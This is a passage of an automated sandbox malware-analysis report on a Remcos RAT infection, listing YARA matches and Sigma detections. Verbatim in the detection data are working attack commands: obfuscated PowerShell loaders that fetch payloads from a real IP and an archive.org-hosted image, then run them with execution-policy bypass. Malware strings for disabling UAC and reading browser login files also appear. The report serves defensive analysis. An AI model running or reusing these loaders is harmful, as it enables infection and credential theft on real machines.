"Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            28.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              28.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                28.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  28.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  28.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 19 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICA
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3528, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3776, ProcessName: mshta.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; 